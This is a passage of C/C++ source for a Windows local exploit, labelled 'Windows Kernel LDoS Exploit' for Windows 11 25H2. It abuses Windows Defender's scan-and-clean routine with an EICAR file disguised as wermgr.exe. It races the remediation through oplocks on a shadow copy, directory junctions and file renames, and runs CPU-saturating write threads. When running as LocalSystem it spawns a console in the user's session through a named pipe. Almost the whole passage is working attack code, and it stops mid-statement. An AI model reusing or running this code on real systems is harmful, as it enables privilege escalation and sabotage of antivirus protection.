lstat = RegQueryValueEx(hkey, L"InstallLocation", NULL, &keytype, (LPBYTE)dirname, &datasz);
if (lstat) {
printf("[!] Failed to query Windows Defender install location, error: %d\n", lstat);
return false;
}
RegCloseKey(hkey);
return true;
}
bool GetWERDir(wchar_t* dirname) {
wchar_t windir[MAX_PATH] = { 0 };
GetWindowsDirectory(windir, MAX_PATH);
wcscpy(dirname, windir);
wcscat(dirname, L"\\System32");
return true;
}
DWORD WINAPI WDStartScan(void*) {
wchar_t dllpath[MAX_PATH] = { 0 };
if (!GetWDInstallDir(dllpath)) {
ExitProcess(1);
}
wcscat(dllpath, L"MpClient.dll");
HMODULE hm = LoadLibrary(dllpath);
if (!hm) {
printf("[!] Failed to load MpClient.dll, error: %d\n", GetLastError());
ExitProcess(1);
}
HRESULT(WINAPI* _MpUpdateStart)(MPHANDLE, DWORD, PMPCALLBACK_INFO, PMPHANDLE) =
(HRESULT(WINAPI*)(MPHANDLE, DWORD, PMPCALLBACK_INFO, PMPHANDLE))
GetProcAddress(hm, "MpUpdateStart");
HRESULT(WINAPI* _MpManagerOpen)(DWORD, PMPHANDLE) =
(HRESULT(WINAPI*)(DWORD, PMPHANDLE))
GetProcAddress(hm, "MpManagerOpen");
HRESULT(WINAPI* _MpScanStart)(MPHANDLE, MPSCAN_TYPE, DWORD, PMPSCAN_RESOURCES, PMPCALLBACK_INFO, PMPHANDLE) =
(HRESULT(WINAPI*)(MPHANDLE, MPSCAN_TYPE, DWORD, PMPSCAN_RESOURCES, PMPCALLBACK_INFO, PMPHANDLE))
GetProcAddress(hm, "MpScanStart");
HRESULT(WINAPI* _MpScanResult)(MPHANDLE, void*) =
(HRESULT(WINAPI*)(MPHANDLE, void*))
GetProcAddress(hm, "MpScanResult");
HRESULT(WINAPI* _MpThreatOpen)(MPHANDLE, MPTHREAT_SOURCE, MPTHREAT_TYPE, PMPHANDLE) =
(HRESULT(WINAPI*)(MPHANDLE, MPTHREAT_SOURCE, MPTHREAT_TYPE, PMPHANDLE))
GetProcAddress(hm, "MpThreatOpen");
HRESULT(WINAPI* _MpThreatEnumerate)(MPHANDLE, PMPTHREAT_INFO*) =
(HRESULT(WINAPI*)(MPHANDLE, PMPTHREAT_INFO*))
GetProcAddress(hm, "MpThreatEnumerate");
HRESULT(WINAPI* _MpCleanOpen)(void*, void*, void***) =
(HRESULT(WINAPI*)(void*, void*, void***))
GetProcAddress(hm, "MpCleanOpen");
HRESULT(WINAPI* _MpCleanStart)(void*, unsigned int, void*) =
(HRESULT(WINAPI*)(void*, unsigned int, void*))
GetProcAddress(hm, "MpCleanStart");
HRESULT(WINAPI* _MpHandleClose)(MPHANDLE) =
(HRESULT(WINAPI*)(MPHANDLE))
GetProcAddress(hm, "MpHandleClose");
if (!_MpManagerOpen || !_MpScanStart || !_MpScanResult || !_MpThreatOpen ||
!_MpThreatEnumerate || !_MpCleanOpen || !_MpCleanStart || !_MpHandleClose) {
printf("[!] Failed to initialize DLL imports.\n");
ExitProcess(1);
}
MPHANDLE hbinding = NULL;
HRESULT hres = _MpManagerOpen(NULL, &hbinding);
if (hres) {
printf("[!] Failed to open Windows Defender RPC interface, error: 0x%0.8X\n", hres);
ExitProcess(1);
}
MPRESOURCE_INFO scaninfo = { 0 };
scaninfo.Scheme = (wchar_t*)L"file";
scaninfo.Path = zippath;
MPSCAN_RESOURCES scanrsrc = { 0 };
scanrsrc.dwResourceCount = 1;
scanrsrc.pResourceList = &scaninfo;
MPHANDLE scanctx = NULL;
hres = _MpScanStart(hbinding, MPSCAN_TYPE_RESOURCE, 0x60004000, &scanrsrc, NULL, &scanctx);
if (hres) {
printf("[!] Failed to start Windows Defender scan, error: 0x%0.8X\n", hres);
ExitProcess(1);
}
DWORD sz = 0x90;
void* scanres = malloc(0x90);
ZeroMemory(scanres, 0x90);
hres = _MpScanResult(scanctx, scanres);
if (hres) {
printf("[!] Failed to fetch scan results, error: 0x%0.8X\n", hres);
ExitProcess(1);
}
MPHANDLE threatctx = NULL;
hres = _MpThreatOpen(scanctx, MPTHREAT_SOURCE_SCAN, MPTHREAT_TYPE_KNOWNBAD, &threatctx);
if (hres) {
printf("[!] Failed to open threats, error: 0x%0.8X\n", hres);
ExitProcess(1);
}
MPTHREAT_INFO* tinfo = NULL;
hres = _MpThreatEnumerate(threatctx, &tinfo);
if (hres == 0x1) {
printf("[*] No threats found.\n");
ExitProcess(0);
}
if (hres) {
printf("[!] Failed to enumerate threats, error: 0x%0.8X\n", hres);
ExitProcess(1);
}
if (tinfo->ThreatStatus != 0x1) {
printf("[!] Unexpected reply from MpThreatEnumerate.\n");
ExitProcess(1);
}
void** ret = NULL;
hres = _MpCleanOpen(scanctx, NULL, &ret);
if (hres) {
printf("[!] MpCleanOpen failed, error: 0x%0.8X\n", hres);
ExitProcess(1);
}
void* callbackaddr[2] = { (void*)MpCleanCallbackFunction, (void*)MpCleanCallbackFunction };
hres = _MpCleanStart(ret, NULL, callbackaddr);
if (hres) {
printf("[!] MpCleanStart failed, error: 0x%0.8X\n", hres);
ExitProcess(1);
}
_MpHandleClose(scanctx);
_MpHandleClose(threatctx);
_MpHandleClose(hbinding);

return ERROR_SUCCESS;
}
char* eicar_data = NULL;
DWORD eicar_sz = 0;

HANDLE WriteEicar(wchar_t* workdir, wchar_t* isomnt) {
wchar_t eicarpath[MAX_PATH] = { 0 };
wsprintf(eicarpath, L"%s\\wermgr.exe", workdir);

HANDLE hfile = NULL;
UNICODE_STRING _eicarpath = { 0 };
RtlInitUnicodeString(&_eicarpath, eicarpath);
OBJECT_ATTRIBUTES eicarpathobjattr = { 0 };
InitializeObjectAttributes(&eicarpathobjattr, &_eicarpath, OBJ_CASE_INSENSITIVE, NULL, NULL);
IO_STATUS_BLOCK iostat = { 0 };

NTSTATUS stat = NtCreateFile(&hfile, GENERIC_READ | GENERIC_WRITE | DELETE | SYNCHRONIZE,
&eicarpathobjattr, &iostat, NULL, FILE_ATTRIBUTE_NORMAL,
FILE_SHARE_READ, FILE_OVERWRITE_IF, NULL, NULL, NULL);
if (stat) {
printf("[!] Failed to create EICAR test file: %ws, error: 0x%0.8X\n", eicarpath, stat);
return NULL;
}

if (eicar_data && eicar_sz) {
DWORD writtenbytes = 0;
OVERLAPPED ovp = { 0 };
ovp.hEvent = CreateEvent(NULL, FALSE, FALSE, NULL);
if (WriteFile(hfile, eicar_data, eicar_sz, &writtenbytes, &ovp) == ERROR_IO_PENDING) {
printf("[!] Failed to write EICAR data, error: %d\n", GetLastError());
return NULL;
}
return hfile;
}
HANDLE hsrc = NULL;
wchar_t eicarsrcpath[MAX_PATH] = { 0 };
wsprintf(eicarsrcpath, L"%s\\wermgr.exe", isomnt);
UNICODE_STRING _eicarsrcpath = { 0 };
RtlInitUnicodeString(&_eicarsrcpath, eicarsrcpath);
OBJECT_ATTRIBUTES eicarsrcpathobjattr = { 0 };
InitializeObjectAttributes(&eicarsrcpathobjattr, &_eicarsrcpath, OBJ_CASE_INSENSITIVE, NULL, NULL);
iostat = { 0 };

stat = NtCreateFile(&hsrc, GENERIC_READ, &eicarsrcpathobjattr, &iostat, NULL, FILE_ATTRIBUTE_NORMAL,
FILE_SHARE_READ | FILE_SHARE_WRITE | FILE_SHARE_DELETE, FILE_OPEN, NULL, NULL, NULL);
if (stat) {
printf("[!] Failed to open EICAR test file: %ws, error: 0x%0.8X\n", eicarpath, stat);
return NULL;
}

LARGE_INTEGER li = { 0 };
GetFileSizeEx(hsrc, &li);
eicar_sz = li.QuadPart;
eicar_data = (char*)malloc(li.QuadPart);

DWORD retbytes = 0;
OVERLAPPED ovp2 = { 0 };
ovp2.hEvent = CreateEvent(NULL, FALSE, FALSE, NULL);

if (ReadFile(hsrc, eicar_data, li.QuadPart, &retbytes, &ovp2) == ERROR_IO_PENDING) {
printf("[!] Failed to read EICAR data, error: %d\n", GetLastError());
return NULL;
}
WaitForSingleObject(ovp2.hEvent, INFINITE);
CloseHandle(ovp2.hEvent);

DWORD writtenbytes = 0;
OVERLAPPED ovp = { 0 };
ovp.hEvent = CreateEvent(NULL, FALSE, FALSE, NULL);

if (WriteFile(hfile, eicar_data, li.QuadPart, &writtenbytes, &ovp) == ERROR_IO_PENDING) {
printf("[!] Failed to write EICAR data, error: %d\n", GetLastError());
return NULL;
}
WaitForSingleObject(ovp.hEvent, INFINITE);
ResetEvent(ovp.hEvent);
void* eicar2 = malloc(0x1000);
UNICODE_STRING adsname = { 0 };
RtlInitUnicodeString(&adsname, L":WDFOO");
OBJECT_ATTRIBUTES objattr2 = { 0 };
InitializeObjectAttributes(&objattr2, &adsname, OBJ_CASE_INSENSITIVE, hfile, NULL);

HANDLE hstream = NULL;
stat = NtCreateFile(&hstream, GENERIC_WRITE | SYNCHRONIZE, &objattr2, &iostat, NULL, FILE_ATTRIBUTE_NORMAL,
FILE_SHARE_READ | FILE_SHARE_WRITE | FILE_SHARE_DELETE, FILE_CREATE, NULL, NULL, NULL);
if (stat) {
printf("[!] Failed to create EICAR stream file: %ws%ws, error: 0x%0.8X\n", eicarpath, adsname.Buffer, stat);
return NULL;
}

if (WriteFile(hstream, eicar2, 0x1000, &writtenbytes, &ovp) == ERROR_IO_PENDING) {
printf("[!] Failed to write ADS data, error: %d\n", GetLastError());
return NULL;
}

free(eicar2);
CloseHandle(hstream);
WaitForSingleObject(ovp.hEvent, INFINITE);
CloseHandle(ovp.hEvent);
CloseHandle(hsrc);

return hfile;
}
bool MoveToTempDir(HANDLE hobj, wchar_t* targetpath = NULL) {
GUID uid = { 0 };
RPC_WSTR wuid = { 0 };
UuidCreate(&uid);
UuidToStringW(&uid, &wuid);
wchar_t* wuid2 = (wchar_t*)wuid;

wchar_t target[MAX_PATH] = { 0 };
if (targetpath) {
wcscpy(target, targetpath);
} else {
ExpandEnvironmentStrings(L"\\??\\%TEMP%\\RP_", target, MAX_PATH);
wcscat(target, wuid2);
}

IO_STATUS_BLOCK iostat = { 0 };
PFILE_RENAME_INFORMATION fri = (PFILE_RENAME_INFORMATION)malloc(sizeof(FILE_RENAME_INFORMATION) + sizeof(target));
ZeroMemory(fri, sizeof(FILE_RENAME_INFORMATION) + sizeof(target));
memmove(&fri->FileName[0], target, wcslen(target) * sizeof(wchar_t));
fri->FileNameLength = wcslen(target) * sizeof(wchar_t);
fri->Flags = 0x00000001 | 0x00000040;

do {
NTSTATUS stat = _NtSetInformationFile(hobj, &iostat, fri, sizeof(FILE_RENAME_INFORMATION) + sizeof(target),
(FILE_INFORMATION_CLASS)custom_defs::FileRenameInformationEx);
if (stat == STATUS_SUCCESS)
return true;
if (stat == STATUS_SHARING_VIOLATION)
continue;
if (stat) {
printf("[!] Failed to move directory, error: 0x%0.8X\n", stat);
return false;
}
} while (1);

return true;
}
bool CreateJunction(HANDLE hdir, wchar_t* target) {
wchar_t rptarget[MAX_PATH] = { 0 };
wchar_t printname[1] = { L'\0' };
wcscpy(rptarget, target);
size_t targetsz = wcslen(rptarget) * 2;
size_t printnamesz = 1 * 2;
size_t pathbuffersz = targetsz + printnamesz + 12;
size_t totalsz = pathbuffersz + REPARSE_DATA_BUFFER_HEADER_LENGTH;
REPARSE_DATA_BUFFER* rdb = (REPARSE_DATA_BUFFER*)HeapAlloc(GetProcessHeap(), HEAP_GENERATE_EXCEPTIONS | HEAP_ZERO_MEMORY, totalsz);
rdb->ReparseTag = IO_REPARSE_TAG_MOUNT_POINT;
rdb->ReparseDataLength = static_cast<USHORT>(pathbuffersz);
rdb->Reserved = 0;
rdb->MountPointReparseBuffer.SubstituteNameOffset = 0;
rdb->MountPointReparseBuffer.SubstituteNameLength = static_cast<USHORT>(targetsz);
memcpy(rdb->MountPointReparseBuffer.PathBuffer, rptarget, targetsz + 2);
rdb->MountPointReparseBuffer.PrintNameOffset = static_cast<USHORT>(targetsz + 2);
rdb->MountPointReparseBuffer.PrintNameLength = static_cast<USHORT>(printnamesz);
memcpy(rdb->MountPointReparseBuffer.PathBuffer + targetsz / 2 + 1, printname, printnamesz);

OVERLAPPED ov = { 0 };
ov.hEvent = CreateEvent(NULL, FALSE, FALSE, NULL);
if (!ov.hEvent) {
return false;
}

DeviceIoControl(hdir, FSCTL_SET_REPARSE_POINT, rdb, totalsz, NULL, 0, NULL, &ov);
HeapFree(GetProcessHeap(), NULL, rdb);
rdb = NULL;

if (GetLastError() == ERROR_IO_PENDING) {
DWORD retsz = 0;
GetOverlappedResult(hdir, &ov, &retsz, TRUE);
}

if (GetLastError() != ERROR_SUCCESS) {
printf("[!] Failed to create reparse point, error: %d\n", GetLastError());
return false;
}

return true;
}
bool MountISO(HANDLE* hiso) {
GUID uid = { 0 };
RPC_WSTR wuid = { 0 };
UuidCreate(&uid);
UuidToStringW(&uid, &wuid);
wchar_t* wuid2 = (wchar_t*)wuid;

wchar_t target[MAX_PATH] = { 0 };
ExpandEnvironmentStrings(L"%TEMP%\\RP_", target, MAX_PATH);
wcscat(target, wuid2);

HANDLE hf = CreateFile(target, GENERIC_READ | GENERIC_WRITE,
FILE_SHARE_READ | FILE_SHARE_WRITE | FILE_SHARE_DELETE,
NULL, CREATE_ALWAYS, FILE_ATTRIBUTE_NORMAL, NULL);
if (!hf || hf == INVALID_HANDLE_VALUE) {
printf("[!] Failed to create ISO file, error: %d\n", GetLastError());
return false;
}

DWORD dwbytes = 0;
if (!WriteFile(hf, rawData, sizeof(rawData), &dwbytes, NULL)) {
printf("[!] Failed to write data to .iso file, error: %d\n", GetLastError());
return false;
}
CloseHandle(hf);

static const GUID VIRTUAL_STORAGE_TYPE_VENDOR_MS = {
0xEC984AEC, 0xA0F9, 0x47e9, 0x90, 0x1F, 0x71, 0x41, 0x5A, 0x66, 0x34, 0x5B
};

VIRTUAL_STORAGE_TYPE vst = { VIRTUAL_STORAGE_TYPE_DEVICE_ISO, VIRTUAL_STORAGE_TYPE_VENDOR_MS };
HANDLE hvirtdisk = NULL;

DWORD retval = OpenVirtualDisk(&vst, target,
VIRTUAL_DISK_ACCESS_GET_INFO | VIRTUAL_DISK_ACCESS_ATTACH_RO | VIRTUAL_DISK_ACCESS_DETACH,
OPEN_VIRTUAL_DISK_FLAG_NONE, NULL, &hvirtdisk);
if (retval) {
printf("[!] Failed to open virtual disk, error: %d\n", GetLastError());
return false;
}

retval = AttachVirtualDisk(hvirtdisk, NULL,
ATTACH_VIRTUAL_DISK_FLAG_READ_ONLY | ATTACH_VIRTUAL_DISK_FLAG_NO_DRIVE_LETTER,
NULL, NULL, NULL);
if (retval) {
printf("[!] Failed to attach virtual disk, error: %d\n", GetLastError());
return false;
}

if (hiso)
*hiso = hvirtdisk;

return true;
}

BOOL SetPrivilege(HANDLE hToken, LPCTSTR lpszPrivilege, BOOL bEnablePrivilege) {
TOKEN_PRIVILEGES tp;
LUID luid;

if (!LookupPrivilegeValue(NULL, lpszPrivilege, &luid)) {
printf("[!] LookupPrivilegeValue error: %u\n", GetLastError());
return FALSE;
}

tp.PrivilegeCount = 1;
tp.Privileges[0].Luid = luid;
if (bEnablePrivilege)
tp.Privileges[0].Attributes = SE_PRIVILEGE_ENABLED;
else
tp.Privileges[0].Attributes = 0;

if (!AdjustTokenPrivileges(hToken, FALSE, &tp, 0, (PTOKEN_PRIVILEGES)NULL, (PDWORD)NULL)) {
printf("[!] AdjustTokenPrivileges error: %u\n", GetLastError());
return FALSE;
}

if (GetLastError() == ERROR_NOT_ALL_ASSIGNED) {
printf("[!] The token does not have the specified privilege.\n");
return FALSE;
}

return TRUE;
}

bool IsRunningAsLocalSystem() {
HANDLE htoken = NULL;
if (!OpenProcessToken(GetCurrentProcess(), TOKEN_QUERY, &htoken)) {
printf("[!] OpenProcessToken failed, error: %d\n", GetLastError());
return false;
}

TOKEN_USER* tokenuser = (TOKEN_USER*)malloc(MAX_SID_SIZE + sizeof(TOKEN_USER));
DWORD retsz = 0;
bool res = GetTokenInformation(htoken, TokenUser, tokenuser, MAX_SID_SIZE + sizeof(TOKEN_USER), &retsz);
CloseHandle(htoken);

if (!res)
return false;

return IsWellKnownSid(tokenuser->User.Sid, WinLocalSystemSid);
}

void LaunchConsoleInSessionId(DWORD sessionid) {
HANDLE htoken = NULL;
if (!OpenProcessToken(GetCurrentProcess(), TOKEN_ALL_ACCESS, &htoken))
return;

SetPrivilege(htoken, SE_TCB_NAME, TRUE);
SetPrivilege(htoken, SE_ASSIGNPRIMARYTOKEN_NAME, TRUE);
SetPrivilege(htoken, SE_IMPERSONATE_NAME, TRUE);
SetPrivilege(htoken, SE_DEBUG_NAME, TRUE);

HANDLE hnewtoken = NULL;
bool res = DuplicateTokenEx(htoken, TOKEN_ALL_ACCESS, NULL, SecurityDelegation, TokenPrimary, &hnewtoken);
CloseHandle(htoken);

if (!res)
return;

res = SetTokenInformation(hnewtoken, TokenSessionId, &sessionid, sizeof(DWORD));
if (!res) {
CloseHandle(hnewtoken);
return;
}

STARTUPINFO si = { 0 };
si.cb = sizeof(si);
PROCESS_INFORMATION pi = { 0 };

CreateProcessAsUser(hnewtoken, L"C:\\Windows\\System32\\conhost.exe", NULL,
NULL, NULL, FALSE, NULL, NULL, NULL, &si, &pi);

CloseHandle(hnewtoken);

if (pi.hProcess)
CloseHandle(pi.hProcess);
if (pi.hThread)
CloseHandle(pi.hThread);

return;
}

DWORD WINAPI PoseidonGeneratorThread(void*) {
SetThreadPriority(GetCurrentThread(), THREAD_PRIORITY_BELOW_NORMAL);
WaitForSingleObject(g_poseidonevent, INFINITE);

do {
BCryptGenRandom(NULL, (PUCHAR)g_poseidonbuf, sizeof(g_poseidonbuf), BCRYPT_USE_SYSTEM_PREFERRED_RNG);
} while (!g_poseidonexit);

return ERROR_SUCCESS;
}

DWORD WINAPI PoseidonThread(void*) {
GUID uid = { 0 };
RPC_WSTR wuid = { 0 };
UuidCreate(&uid);
UuidToStringW(&uid, &wuid);
wchar_t* wuid2 = (wchar_t*)wuid;

wchar_t target[MAX_PATH] = { 0 };
ExpandEnvironmentStrings(L"%TEMP%\\RP_", target, MAX_PATH);
wcscat(target, wuid2);

HANDLE hfile = CreateFile(target, GENERIC_ALL, NULL, NULL, CREATE_NEW,
FILE_ATTRIBUTE_NORMAL | FILE_FLAG_DELETE_ON_CLOSE, NULL);
if (!hfile || hfile == INVALID_HANDLE_VALUE)
return GetLastError();

WaitForSingleObject(g_poseidonevent, INFINITE);

try {
do {
SetFilePointer(hfile, 0, NULL, FILE_BEGIN);
DWORD ret = 0;
WriteFile(hfile, g_poseidonbuf, sizeof(g_poseidonbuf), &ret, NULL);
} while (!g_poseidonexit);
} catch (int e) {
}

CloseHandle(hfile);
return ERROR_SUCCESS;
}
int main() {
printf("============================================================\n");
printf(" inouva - Windows Kernel LDoS Exploit\n");
printf(" Windows 11 25H2 (Build 26200) and later\n");
printf("============================================================\n\n");

ntdllhm = GetModuleHandle(L"ntdll.dll");
if (!ntdllhm) {
printf("[!] Failed to get ntdll.dll handle.\n");
return 1;
}

_NtSetInformationFile = (NTSTATUS(WINAPI*)(HANDLE, PIO_STATUS_BLOCK, PVOID, ULONG, FILE_INFORMATION_CLASS))
GetProcAddress(ntdllhm, "NtSetInformationFile");
_NtDeleteFile = (NTSTATUS(WINAPI*)(POBJECT_ATTRIBUTES))
GetProcAddress(ntdllhm, "NtDeleteFile");
_NtOpenDirectoryObject = (NTSTATUS(WINAPI*)(PHANDLE, ACCESS_MASK, POBJECT_ATTRIBUTES))
GetProcAddress(ntdllhm, "NtOpenDirectoryObject");
_NtQueryDirectoryObject = (NTSTATUS(WINAPI*)(HANDLE, PVOID, ULONG, BOOLEAN, BOOLEAN, PULONG, PULONG))
GetProcAddress(ntdllhm, "NtQueryDirectoryObject");
_NtQueryInformationFile = (NTSTATUS(WINAPI*)(HANDLE, PIO_STATUS_BLOCK, PVOID, ULONG, FILE_INFORMATION_CLASS))
GetProcAddress(ntdllhm, "NtQueryInformationFile");

if (!_NtSetInformationFile || !_NtDeleteFile || !_NtOpenDirectoryObject ||
!_NtQueryDirectoryObject || !_NtQueryInformationFile) {
printf("[!] Failed to import NT API functions.\n");
return 1;
}
g_poseidonevent = CreateEvent(NULL, FALSE, FALSE, NULL);
if (!g_poseidonevent) {
printf("[!] Failed to create event.\n");
return 1;
}
if (IsRunningAsLocalSystem()) {
printf("[*] Running as Local System.\n");
HANDLE hclient = CreateFile(L"\\\\.\\pipe\\RoguePlanet", GENERIC_READ | GENERIC_WRITE,
FILE_SHARE_READ | FILE_SHARE_WRITE | FILE_SHARE_DELETE,
NULL, OPEN_EXISTING, NULL, NULL);
if (!hclient || hclient == INVALID_HANDLE_VALUE)
return 1;

DWORD sesid = 0;
bool sh = GetNamedPipeServerSessionId(hclient, &sesid);
CloseHandle(hclient);

if (sh) {
LaunchConsoleInSessionId(sesid);
}
return 0;
}
SYSTEM_INFO sysinfo = { 0 };
GetSystemInfo(&sysinfo);

if (sysinfo.dwNumberOfProcessors > 3) {
DWORD tid = 0;
CreateThread(NULL, 0, PoseidonGeneratorThread, NULL, 0, &tid);

for (int i = 0; i < sysinfo.dwNumberOfProcessors; i++) {
DWORD tid0 = 0;
CreateThread(NULL, 0, PoseidonThread, NULL, 0, &tid0);
}
printf("[*] Started %d Poseidon threads.\n", sysinfo.dwNumberOfProcessors);
}
HANDLE hpipe = CreateNamedPipe(L"\\\\.\\pipe\\RoguePlanet", PIPE_ACCESS_DUPLEX,
PIPE_WAIT, PIPE_UNLIMITED_INSTANCES,
NULL, NULL, NULL, NULL);
if (!hpipe || hpipe == INVALID_HANDLE_VALUE) {
printf("[!] Failed to create communication pipe, error: %d\n", GetLastError());
return 1;
}
printf("[*] Stage 1: Mounting ISO...\n");
HANDLE hvirtdisk = NULL;
if (!MountISO(&hvirtdisk)) {
printf("[!] Failed to mount ISO.\n");
return 1;
}
printf("[+] ISO mounted successfully.\n");
wchar_t windir2[MAX_PATH] = { 0 };
GetWindowsDirectory(windir2, MAX_PATH);

HANDLE hwin = CreateFile(windir2, GENERIC_READ,
FILE_SHARE_READ | FILE_SHARE_WRITE | FILE_SHARE_DELETE,
NULL, OPEN_EXISTING, FILE_FLAG_BACKUP_SEMANTICS, NULL);
if (!hwin || hwin == INVALID_HANDLE_VALUE) {
printf("[!] Failed to open %ws, error: %d\n", windir2, GetLastError());
return 1;
}
printf("[*] Stage 2: Creating working directory structure...\n");

wchar_t workdir[MAX_PATH] = { 0 };
GUID uid = { 0 };
RPC_WSTR wuid = { 0 };
UuidCreate(&uid);
UuidToStringW(&uid, &wuid);
wchar_t* wuid2 = (wchar_t*)wuid;
ExpandEnvironmentStrings(L"%TEMP%\\RP_", workdir, MAX_PATH);
wcscat(workdir, wuid2);

if (!CreateDirectory(workdir, NULL)) {
printf("[!] Failed to create work directory, error: %d\n", GetLastError());
return 1;
}
SetPriorityClass(GetCurrentProcess(), HIGH_PRIORITY_CLASS);
SetThreadPriority(GetCurrentThread(), THREAD_PRIORITY_TIME_CRITICAL);
HANDLE hdirtmp = NULL;
wchar_t dirtmp[MAX_PATH] = { 0 };
wsprintf(dirtmp, L"\\??\\%s\\wdtest_temp", workdir);
UNICODE_STRING _dirtmp = { 0 };
RtlInitUnicodeString(&_dirtmp, dirtmp);
OBJECT_ATTRIBUTES dirtmpobjattr = { 0 };
InitializeObjectAttributes(&dirtmpobjattr, &_dirtmp, OBJ_CASE_INSENSITIVE, NULL, NULL);
IO_STATUS_BLOCK iostat = { 0 };

NTSTATUS dirstat = NtCreateFile(&hdirtmp, GENERIC_READ | GENERIC_WRITE | DELETE | SYNCHRONIZE,
&dirtmpobjattr, &iostat, NULL, NULL, FILE_SHARE_READ,
FILE_CREATE, FILE_DIRECTORY_FILE, NULL, NULL);
if (dirstat) {
printf("[!] Failed to create working directory: %ws, error: 0x%0.8X\n", dirtmp, dirstat);
return 1;
}

wchar_t wddirname[MAX_PATH] = { 0 };
if (!GetWERDir(wddirname)) {
return 1;
}
wchar_t* verdirname = PathFindFileName(wddirname);
wsprintf(zippath, L"%s\\%s\\wermgr.exe", workdir, verdirname);

HANDLE hdir = NULL;
wchar_t maindirname[MAX_PATH] = { 0 };
wsprintf(maindirname, L"\\??\\%s\\%s", workdir, verdirname);
UNICODE_STRING _maindirname = { 0 };
RtlInitUnicodeString(&_maindirname, maindirname);
OBJECT_ATTRIBUTES maindirobjattr = { 0 };
InitializeObjectAttributes(&maindirobjattr, &_maindirname, OBJ_CASE_INSENSITIVE, NULL, NULL);
iostat = { 0 };

dirstat = NtCreateFile(&hdir, GENERIC_READ | FILE_WRITE_DATA | DELETE,
&maindirobjattr, &iostat, NULL, NULL, FILE_SHARE_READ,
FILE_CREATE, FILE_DIRECTORY_FILE, NULL, NULL);
if (dirstat) {
printf("[!] Failed to create working directory: %ws, error: 0x%0.8X\n", maindirname, dirstat);
return 1;
}
printf("[*] Stage 3: Writing EICAR test file...\n");

wchar_t _mntpath[MAX_PATH] = { 0 };
ULONG pathsz = MAX_PATH;
DWORD retval = GetVirtualDiskPhysicalPath(hvirtdisk, &pathsz, _mntpath);
if (retval) {
printf("[!] Failed to fetch mounted disk path, error: %d\n", retval);
return 1;
}

wchar_t mntpath[MAX_PATH] = { L"\\Device\\" };
wcscat(mntpath, PathFindFileName(_mntpath));

HANDLE heicar = WriteEicar(maindirname, mntpath);
if (!heicar)
return 1;
printf("[+] EICAR file written successfully.\n");
printf("[*] Stage 4: Triggering Windows Defender scan...\n");

SetEvent(g_poseidonevent);

DWORD tid = 0;
HANDLE hthread = CreateThread(NULL, 0, WDStartScan, NULL, 0, &tid);
if (!hthread) {
printf("[!] Failed to create working thread, error: %d\n", GetLastError());
return 1;
}
printf("[+] Windows Defender scan started.\n");
printf("[*] Stage 5: Triggering race condition...\n");

wchar_t _delpath[MAX_PATH] = { 0 };
wsprintf(_delpath, L"%s\\wermgr.exe", maindirname);
UNICODE_STRING delpath = { 0 };
RtlInitUnicodeString(&delpath, _delpath);
OBJECT_ATTRIBUTES delobjattr = { 0 };
InitializeObjectAttributes(&delobjattr, &delpath, OBJ_CASE_INSENSITIVE, NULL, NULL);
IO_STATUS_BLOCK deliostat = { 0 };
HANDLE hc = NULL;

wchar_t vsspath[MAX_PATH] = { 0 };
ShadowCopyFinderThread(vsspath);
printf("[*] VSS path: %ws\n", vsspath);

CloseHandle(heicar);
HANDLE hvss = NULL;
wchar_t vsswinpath[MAX_PATH] = { 0 };
wsprintf(vsswinpath, L"%s\\%s\\%s\\wermgr.exe:WDFOO", vsspath, &workdir[3], verdirname);
UNICODE_STRING _vsswinpath = { 0 };
RtlInitUnicodeString(&_vsswinpath, vsswinpath);
OBJECT_ATTRIBUTES objattr2 = { 0 };
InitializeObjectAttributes(&objattr2, &_vsswinpath, OBJ_CASE_INSENSITIVE, NULL, NULL);
iostat = { 0 };

NTSTATUS stat = NtCreateFile(&hvss, GENERIC_READ | SYNCHRONIZE, &objattr2, &iostat,
NULL, NULL, NULL, FILE_OPEN, NULL, NULL, NULL);

REQUEST_OPLOCK_INPUT_BUFFER opin = { 0 };
opin.StructureLength = sizeof(opin);
opin.StructureVersion = REQUEST_OPLOCK_CURRENT_VERSION;
opin.RequestedOplockLevel = OPLOCK_LEVEL_CACHE_READ | OPLOCK_LEVEL_CACHE_HANDLE;
opin.Flags = REQUEST_OPLOCK_INPUT_FLAG_REQUEST;
REQUEST_OPLOCK_OUTPUT_BUFFER opout = { 0 };
opout.StructureLength = sizeof(opout);
opout.StructureVersion = REQUEST_OPLOCK_CURRENT_VERSION;
DWORD cb = 0;
OVERLAPPED ovoplock = { 0 };
ovoplock.hEvent = CreateEvent(NULL, FALSE, FALSE, NULL);

DeviceIoControl(hvss, FSCTL_REQUEST_OPLOCK, &opin, sizeof(opin),
&opout, sizeof(opout), &cb, &ovoplock);
WaitForSingleObject(ovoplock.hEvent, INFINITE);
CloseHandle(hvss);
NTSTATUS delstat = NtCreateFile(&hc, DELETE, &delobjattr, &deliostat, NULL, NULL,
FILE_SHARE_READ | FILE_SHARE_WRITE | FILE_SHARE_DELETE,
FILE_SUPERSEDE, NULL, NULL, NULL);
MoveToTempDir(hc);
if (!CreateJunction(hdir, mntpath))
return 1;

if (hc)
CloseHandle(hc);

printf("[*] Stage 6: Monitoring for directory changes...\n");

char buff[0x1000] = { 0 };
wchar_t teststr[] = { L"Temp\\TMP" };

do {
ZeroMemory(buff, sizeof(buff));
DWORD retbytes = 0;
ReadDirectoryChangesW(hwin, buff, sizeof(buff), TRUE,
FILE_NOTIFY_CHANGE_FILE_NAME, &retbytes, NULL, NULL);
PFILE_NOTIFY_INFORMATION pfni = (PFILE_NOTIFY_INFORMATION)buff;
if (pfni->FileNameLength / 2 != 24 || _wcsnicmp(&pfni->FileName[0], teststr, 8) != 0)
continue;
break;
} while (1);
printf("[*] Stage 7: Finalizing exploit...\n");

wchar_t workdir2[MAX_PATH] = { L"\\??\\" };
wcscat(workdir2, workdir);

if (!CreateJunction(hdir, dirtmp)) {
return 1;
}
wchar_t lockpath[MAX_PATH] = { 0 };
wsprintf(lockpath, L"%s\\wermgr.exe", mntpath);
HANDLE hlock1 = NULL;
UNICODE_STRING _lockpath = { 0 };
RtlInitUnicodeString(&_lockpath, lockpath);
OBJECT_ATTRIBUTES lockpathobjattr = { 0 };
InitializeObjectAttributes(&lockpathobjattr, &_lockpath, OBJ_CASE_INSENSITIVE, NULL, NULL);
iostat = { 0 };

CloseHandle(WriteEicar(maindirname, mntpath));

stat = NtCreateFile(&hlock1, GENERIC_READ, &lockpathobjattr, &iostat, NULL, FILE_ATTRIBUTE_NORMAL,
FILE_SHARE_READ | FILE_SHARE_WRITE | FILE_SHARE_DELETE, FILE_OPEN, NULL, NULL, NULL);
if (stat) {
